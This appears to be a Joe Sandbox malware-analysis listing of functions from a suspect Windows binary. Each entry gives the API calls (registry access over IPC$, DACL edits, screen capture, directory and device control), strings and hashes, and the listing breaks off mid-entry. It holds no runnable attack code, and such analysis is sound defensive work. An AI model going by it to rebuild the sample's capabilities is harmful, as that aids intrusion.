                            Function 000D0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLocalTime.KERNEL32(?), ref: 000D0EFF
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000D0F0F
                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000D0F1B
                            • __wsplitpath.LIBCMT ref: 000D0F79
                            • _wcscat.LIBCMT ref: 000D0F91
                            • _wcscat.LIBCMT ref: 000D0FA3
                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 000D0FB8
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0FCC
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0FFE
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D101F
                            • _wcscpy.LIBCMT ref: 000D102B
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000D106A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                            • String ID: *.*
                            • API String ID: 3566783562-438819550
                            • Opcode ID: 1623aa06665235dcca1b2b99e8b87473aa00c98942d24f41ff1edaf6516813af
                            • Instruction ID: 4b0f246c439b4f5009bcae42d457eac2486afce7d41b7845feac605dc0394397
                            • Opcode Fuzzy Hash: 1623aa06665235dcca1b2b99e8b87473aa00c98942d24f41ff1edaf6516813af
                            • Instruction Fuzzy Hash: 78614D76504305AFD710EF60C844ADEB7E8FF89310F04891EF99997252EB31E945CBA2
                            Function 000CDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • CharLowerBuffW.USER32(?,?), ref: 000CDB26
                            • GetDriveTypeW.KERNEL32 ref: 000CDB73
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CDBBB
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CDBF2
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CDC20
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                            • API String ID: 2698844021-4113822522
                            • Opcode ID: 53899e07fec469c7276d8bcacda702e6cbdeac6f9bbb34d8a9d7898d82a6ac68
                            • Instruction ID: 678ee9fb93a30f2447586beaedfd1a80303cc5ec440fbaea55310a2955cdabc9
                            • Opcode Fuzzy Hash: 53899e07fec469c7276d8bcacda702e6cbdeac6f9bbb34d8a9d7898d82a6ac68
                            • Instruction Fuzzy Hash: 4C514771104705AFC700EF10C9819AAB7F8FF88758F50886DF899A7262DB71EE05CB52
                            Function 000C3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,000F4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 000C3145
                            • LoadStringW.USER32(00000000,?,000F4085,00000016), ref: 000C314E
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,000F4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 000C3170
                            • LoadStringW.USER32(00000000,?,000F4085,00000016), ref: 000C3173
                            • __swprintf.LIBCMT ref: 000C31B3
                            • __swprintf.LIBCMT ref: 000C31C5
                            • _wprintf.LIBCMT ref: 000C326C
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C3283
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                            • API String ID: 984253442-2268648507
                            • Opcode ID: 1ce60e938c43b9853de43eef1adce19f348707332d75b02508ddd0cebfd42579
                            • Instruction ID: 5fbda718c9cd3a5a34fdd7bf9ea588698be3512477b93483d53dcbe3a261a216
                            • Opcode Fuzzy Hash: 1ce60e938c43b9853de43eef1adce19f348707332d75b02508ddd0cebfd42579
                            • Instruction Fuzzy Hash: 04413D72900209AADB14FBE0DD86EEEB779AF14701F504065F645B20A3DBB5AF44CB61
                            Function 000CD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 000CD96C
                            • __swprintf.LIBCMT ref: 000CD98E
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 000CD9CB
                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000CD9F0
                            • _memset.LIBCMT ref: 000CDA0F
                            • _wcsncpy.LIBCMT ref: 000CDA4B
                            • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 000CDA80
                            • CloseHandle.KERNEL32(00000000), ref: 000CDA8B
                            • RemoveDirectoryW.KERNEL32(?), ref: 000CDA94
                            • CloseHandle.KERNEL32(00000000), ref: 000CDA9E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                            • String ID: :$\$\??\%s
                            • API String ID: 2733774712-3457252023
                            • Opcode ID: 4af693505c07e9b9f3d47ed2ff60b5fcb251c3df4691357ad590caae6544a49d
                            • Instruction ID: 0e00b9920edfa8046d0a9f08893da2ec094482897d2433caba2f066b84989c42
                            • Opcode Fuzzy Hash: 4af693505c07e9b9f3d47ed2ff60b5fcb251c3df4691357ad590caae6544a49d
                            • Instruction Fuzzy Hash: 5B319476600208AADB20DFA4DC49FDE77FDEF85710F1081AAF559D2061EB70DA818BA1
                            Function 000EE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,000EBD04,?,?), ref: 000EE564
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE57B
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE586
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE593
                            • GlobalLock.KERNEL32(00000000), ref: 000EE59C
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE5AB
                            • GlobalUnlock.KERNEL32(00000000), ref: 000EE5B4
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE5BB
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE5CC
                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0010D9BC,?), ref: 000EE5E5
                            • GlobalFree.KERNEL32(00000000), ref: 000EE5F5
                            • GetObjectW.GDI32(00000000,00000018,?), ref: 000EE619
                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 000EE644
                            • DeleteObject.GDI32(00000000), ref: 000EE66C
                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000EE682
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                            • String ID:
                            • API String ID: 3840717409-0
                            • Opcode ID: 8203ae67d64099963d69b9c1261eaa488c27d4b36ff6926c1a3bc538a2ec52e2
                            • Instruction ID: e44eee16e2a4cae73880f9722bdbf2cdc24aa5c5eb53f7aec6e9df38c00ebcf3
                            • Opcode Fuzzy Hash: 8203ae67d64099963d69b9c1261eaa488c27d4b36ff6926c1a3bc538a2ec52e2
                            • Instruction Fuzzy Hash: 1D417C75600248FFDB119FA5EC88EAE7BB8EF89715F108058F945E7260DB719D40CB60
                            Function 000D0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                            Download Yara Rule
                            APIs
                            • __wsplitpath.LIBCMT ref: 000D0C93
                            • _wcscat.LIBCMT ref: 000D0CAB
                            • _wcscat.LIBCMT ref: 000D0CBD
                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 000D0CD2
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0CE6
                            • GetFileAttributesW.KERNEL32(?), ref: 000D0CFE
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 000D0D18
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0D2A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                            • String ID: *.*
                            • API String ID: 34673085-438819550
                            • Opcode ID: 2dfdcda6f8bb80de7b7326e4658f2ce800ba4e1ed6ebb4214a556d2b9ae1e90f
                            • Instruction ID: 291e5ebdcf677b58e276f8b4f5dbf3a7cd2d42bd96535535209ec46be51d76a8
                            • Opcode Fuzzy Hash: 2dfdcda6f8bb80de7b7326e4658f2ce800ba4e1ed6ebb4214a556d2b9ae1e90f
                            • Instruction Fuzzy Hash: FA8181715143059FCB64DF64C844AAEB7E9BB88310F14892FF889C7351E734E984CBA2
                            Function 000EECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000EED0C
                            • GetFocus.USER32 ref: 000EED1C
                            • GetDlgCtrlID.USER32(00000000), ref: 000EED27
                            • _memset.LIBCMT ref: 000EEE52
                            • GetMenuItemInfoW.USER32 ref: 000EEE7D
                            • GetMenuItemCount.USER32(00000000), ref: 000EEE9D
                            • GetMenuItemID.USER32(?,00000000), ref: 000EEEB0
                            • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 000EEEE4
                            • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 000EEF2C
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000EEF64
                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 000EEF99
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                            • String ID: 0
                            • API String ID: 1296962147-4108050209
                            • Opcode ID: 83d823a64b7032375105fc37d8b1e6bec01ff5e6b624f1bea0e5b108dec1643a
                            • Instruction ID: 910811595ccb4b050d429351af4c1333416d3c7bd381bcab11738b210d48c170
                            • Opcode Fuzzy Hash: 83d823a64b7032375105fc37d8b1e6bec01ff5e6b624f1bea0e5b108dec1643a
                            • Instruction Fuzzy Hash: 8C81C171208389AFDB50DF55DC84AABBBE4FF88354F00092DF998A7291D771D941CB92
                            Function 000BB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000BB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BB903
                              • Part of subcall function 000BB8E7: GetLastError.KERNEL32(?,000BB3CB,?,?,?), ref: 000BB90D
                              • Part of subcall function 000BB8E7: GetProcessHeap.KERNEL32(00000008,?,?,000BB3CB,?,?,?), ref: 000BB91C
                              • Part of subcall function 000BB8E7: HeapAlloc.KERNEL32(00000000,?,000BB3CB,?,?,?), ref: 000BB923
                              • Part of subcall function 000BB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BB93A
                              • Part of subcall function 000BB982: GetProcessHeap.KERNEL32(00000008,000BB3E1,00000000,00000000,?,000BB3E1,?), ref: 000BB98E
                              • Part of subcall function 000BB982: HeapAlloc.KERNEL32(00000000,?,000BB3E1,?), ref: 000BB995
                              • Part of subcall function 000BB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000BB3E1,?), ref: 000BB9A6
                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000BB5F7
                            • _memset.LIBCMT ref: 000BB60C
                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000BB62B
                            • GetLengthSid.ADVAPI32(?), ref: 000BB63C
                            • GetAce.ADVAPI32(?,00000000,?), ref: 000BB679
                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000BB695
                            • GetLengthSid.ADVAPI32(?), ref: 000BB6B2
                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000BB6C1
                            • HeapAlloc.KERNEL32(00000000), ref: 000BB6C8
                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000BB6E9
                            • CopySid.ADVAPI32(00000000), ref: 000BB6F0
                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000BB721
                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000BB747
                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000BB75B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                            • String ID:
                            • API String ID: 3996160137-0
                            • Opcode ID: aa532e20a95e9e8b1cd23e84b9eb071292b3a2defa9041f1a83d78bd32d9a207
                            • Instruction ID: 607b2b537c91a37019d19a53b2f166d5e577e48ed6f6f912de37c0e356dfcc37
                            • Opcode Fuzzy Hash: aa532e20a95e9e8b1cd23e84b9eb071292b3a2defa9041f1a83d78bd32d9a207
                            • Instruction Fuzzy Hash: E7518C71900209AFDF10DFA4DC85EEEBBB9FF44304F048129F956A72A1DBB09A45CB60
                            Function 000DA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32(00000000), ref: 000DA2DD
                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 000DA2E9
                            • CreateCompatibleDC.GDI32(?), ref: 000DA2F5
                            • SelectObject.GDI32(00000000,?), ref: 000DA302
                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 000DA356
                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 000DA392
                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 000DA3B6
                            • SelectObject.GDI32(00000006,?), ref: 000DA3BE
                            • DeleteObject.GDI32(?), ref: 000DA3C7
                            • DeleteDC.GDI32(00000006), ref: 000DA3CE
                            • ReleaseDC.USER32(00000000,?), ref: 000DA3D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                            • String ID: (
                            • API String ID: 2598888154-3887548279
                            • Opcode ID: 07a40fcba34bcc20854e6e7e12d792cc573699f1765d4da9b5b76fa7f382b24a
                            • Instruction ID: 5f4a44c1abc1fc10fc94779993657a3a0574d4dbee759896ad59b7b65ab666e4
                            • Opcode Fuzzy Hash: 07a40fcba34bcc20854e6e7e12d792cc573699f1765d4da9b5b76fa7f382b24a
                            • Instruction Fuzzy Hash: 2F514A75A00309EFDB15CFA8DC84EAEBBB9EF49310F14851EF99A97350C771A9418B60
                            Function 000CD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                            Download Yara Rule
                            APIs
                            • LoadStringW.USER32(00000066,?,00000FFF), ref: 000CD567
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 000CD589
                            • __swprintf.LIBCMT ref: 000CD5DC
                            • _wprintf.LIBCMT ref: 000CD68D
                            • _wprintf.LIBCMT ref: 000CD6AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove
                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2116804098-2391861430
                            • Opcode ID: 185ada4e35ec14af98b7fbc0f42cb2ce85a5b97492529b71a411ba5de059dac7
                            • Instruction ID: 9941d2f6ec214ad72456afe388d7a9df081e3f0c35ed321ddff598e003433aaa
                            • Opcode Fuzzy Hash: 185ada4e35ec14af98b7fbc0f42cb2ce85a5b97492529b71a411ba5de059dac7
                            • Instruction Fuzzy Hash: 91517171900109BADB15FBE0DD42EEEB7B9BF14704F10416AF145B20A2EB716F88DB61
                            Function 000CD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                            Download Yara Rule
                            APIs
                            • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 000CD37F
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000CD3A0
                            • __swprintf.LIBCMT ref: 000CD3F3
                            • _wprintf.LIBCMT ref: 000CD499
                            • _wprintf.LIBCMT ref: 000CD4B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove
                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2116804098-3420473620
                            • Opcode ID: b1f86094915bc3ee6928bb5a27b6ced2c0b4201a667c944f1ce0eb97247d5e4a
                            • Instruction ID: 9f2fc63ca60147e91a745a1821a9ee6fe552256c383d7645df8a14ef215bb536
                            • Opcode Fuzzy Hash: b1f86094915bc3ee6928bb5a27b6ced2c0b4201a667c944f1ce0eb97247d5e4a
                            • Instruction Fuzzy Hash: A4518071900109BBDB19FBE0DD42EEEB779BF14700F10446AF105A2062EB716F88CB61
                            Function 000BAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • _memset.LIBCMT ref: 000BAF74
                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000BAFA9
                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000BAFC5
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000BAFE1
                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000BB00B
                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 000BB033
                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000BB03E
                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000BB043
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                            • API String ID: 1411258926-22481851
                            • Opcode ID: 8b233c16542568a094ea55fda5ae6f003d7b90278bba1a00d8955b5f13131379
                            • Instruction ID: a1cd5aa8ce1f417ce8706df5e0df8194eaf755a0203a90aedf0bee66910bacc9
                            • Opcode Fuzzy Hash: 8b233c16542568a094ea55fda5ae6f003d7b90278bba1a00d8955b5f13131379
                            • Instruction Fuzzy Hash: BA410776C1022DABDF11EBA4DC85DEEB7B8BF18704F404169F945A21A1EB719E44CF90
                            Function 000E3AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2AA6,?,?), ref: 000E3B0E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
